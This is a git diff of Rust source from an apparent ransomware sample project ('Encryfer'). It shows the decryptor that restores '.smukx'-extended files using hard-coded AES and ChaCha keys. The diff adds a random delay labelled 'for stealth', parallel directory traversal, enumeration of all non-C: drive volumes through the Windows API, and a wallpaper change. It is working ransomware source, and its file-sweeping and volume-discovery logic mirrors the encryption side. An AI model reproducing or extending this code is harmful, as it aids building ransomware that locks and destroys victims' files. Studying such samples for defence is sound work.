+//     original_file_path.set_extension("");  // Remove .smukx extension
+
+//     let mut dec_file = match File::create(&original_file_path) {
+//         Ok(file) => file,
+//         Err(_) => return,
+//     };
+//     if dec_file.write_all(&decrypted_aes).is_err() {
+//         return;
+//     }
+
+//     std::fs::remove_file(file_path).unwrap_or_else(|_| ());
+// }
+
+use std::ffi::OsString;
+use std::fs::{read_dir, File};
 use std::io::{Read, Write};
+use std::os::windows::ffi::OsStringExt;
 use std::path::Path;
+use std::ptr::null_mut;
+use std::thread;
+use std::time::Duration;
+use rand::Rng;
+use rayon::prelude::*;
+use winapi::um::errhandlingapi::GetLastError;
+use winapi::um::fileapi::{FindFirstVolumeW, FindNextVolumeW, FindVolumeClose, GetVolumePathNamesForVolumeNameW};
+use std::fs;
+
 use crate::decrypt::{decrypt_aes, decrypt_chacha};
 
+// Random delay for stealth
+fn random_delay() {
+    let mut rng = rand::thread_rng();
+    let delay = rng.gen_range(10..100); // Random delay between 10ms and 100ms
+    thread::sleep(Duration::from_millis(delay));
+}
+
+// Recursively decrypt files in a directory
 pub fn recursive_decrypt(dir: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
     if dir.is_dir() {
-        let entries = match fs::read_dir(dir) {
-            Ok(entries) => entries,
-            Err(_) => return, 
-        };
-
-        for entry in entries {
-            let entry = match entry {
-                Ok(entry) => entry,
-                Err(_) => continue,  
-            };
-            let path = entry.path();
-            if path.is_dir() {
-                recursive_decrypt(&path, key, chacha_key, chacha_nonce);
-            } else {
-                decrypt_file(&path, key, chacha_key, chacha_nonce);
+        match read_dir(dir) {
+            Ok(entries) => {
+                entries.par_bridge().for_each(|entry| {
+                    random_delay(); // Random delay
+                    match entry {
+                        Ok(entry) => {
+                            let path = entry.path();
+                            if path.is_dir() {
+                                recursive_decrypt(&path, key, chacha_key, chacha_nonce); // Recurse into subdirectories
+                            } else {
+                                decrypt_file(&path, key, chacha_key, chacha_nonce);
+                            }
+                        }
+                        Err(e) => eprintln!("Failed to read entry: {}", e),
+                    }
+                });
             }
+            Err(e) => eprintln!("Failed to read directory '{}': {}", dir.display(), e),
         }
     }
 }
 
 fn decrypt_file(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_nonce: &[u8; 12]) {
+    
     if file_path.extension().and_then(|ext| ext.to_str()) != Some("smukx") {
         return;
     }
@@ -57,3 +150,65 @@ fn decrypt_file(file_path: &Path, key: &[u8; 32], chacha_key: &[u8; 32], chacha_
     fs::remove_file(file_path).unwrap_or_else(|_| ());
 }
 
+pub(crate) fn get_all_volumes() -> Vec<OsString>{
+
+    let mut drive_letters = Vec::new();
+    let mut volume_name: [u16; 260] = [0; 260];
+    let mut path_name: [u16; 260] = [0; 260];
+
+    unsafe{
+        let volume_handle = FindFirstVolumeW(
+            volume_name.as_mut_ptr(),
+            260 as u32,
+        );
+
+        if volume_handle != null_mut(){
+            loop{
+                // let name_length = volume_name.iter().position(|&c| c == 0).unwrap_or(260);
+
+                let result = GetVolumePathNamesForVolumeNameW(
+                    volume_name.as_ptr(),
+                    path_name.as_mut_ptr(),
+                    260 as u32,
+                    null_mut(),
+                );
+
+                if result != 0{
+                    let mut start = 0;
+
+                    while start < 260 {
+                        let path_name_length = path_name[start..].iter().position(|&c| c == 0).unwrap_or(260);
+
+                        if path_name_length == 0{
+                            break;
+                        }
+
+                        let path_name = OsString::from_wide(&path_name[start..start + path_name_length]);
+
+                        if !path_name.to_string_lossy().starts_with("C:\\") && !path_name.to_string_lossy().is_empty(){
+                            drive_letters.push(path_name);
+                        }
+
+                        start += path_name_length + 1;
+
+                    }
+                }
+                let find_next_volume = FindNextVolumeW(
+                    volume_handle, 
+                    volume_name.as_mut_ptr(),
+                    260 as u32
+                );
+
+                if find_next_volume == 0{
+                    if GetLastError() == 18{
+                        break;
+                    }
+                }
+            }
+            FindVolumeClose(volume_handle);
+        }
+    }
+    // At last return the drive letter 
+    drive_letters
+
+}

Malware-Samples/Encryfer/Encyfer-X-Decryptor/src/decrypt.rs

@@ -1,6 +1,7 @@
 use std::path::Path;
 use aes::Aes256;
 use aes::cipher::{KeyIvInit, StreamCipher};
+use file_operand::get_all_volumes;
 use hex::decode;
 // use std::fs;
 mod wall;
@@ -9,6 +10,7 @@ mod file_operand;
 
 type Aes256Ctr = ctr::Ctr128BE<Aes256>;
 
+// Important C Paths !
 use dirs::{
     desktop_dir, 
     download_dir, 
@@ -32,6 +34,10 @@ fn main(){
     for dir in dirs_to_decrypt.iter().flatten(){
         decryptor(dir);
     }
+
+    // Decrypt volumes
+    volume_paths();
+    
     wall::set_wallpaper();
     println!("Decryption process completed.");
 }
@@ -64,7 +70,6 @@ fn decrypt_hexa(keys: String)-> Vec<u8>{
 }
 
 fn decryptor(dir_path: &Path){
-    // let dir_path: &Path = Path::new("D:/maldev/Encrypor-X/test");  // Specify the directory you want to decrypt
 
     let aes_key: [u8; 32] = [
         27, 20, 127, 230, 201, 208, 178, 24, 197, 76, 96, 12, 16, 47, 231, 42, 156, 36, 136, 165, 162, 223, 206, 190, 126, 59, 96, 99, 157, 122, 32, 165
@@ -85,3 +90,12 @@ fn decryptor(dir_path: &Path){
     );
 }
 
+fn volume_paths(){
+    if get_all_volumes().is_empty() {
+        return;
+    }
+    
+    for volume in get_all_volumes() {
+        decryptor(Path::new(&volume));
+    }
+}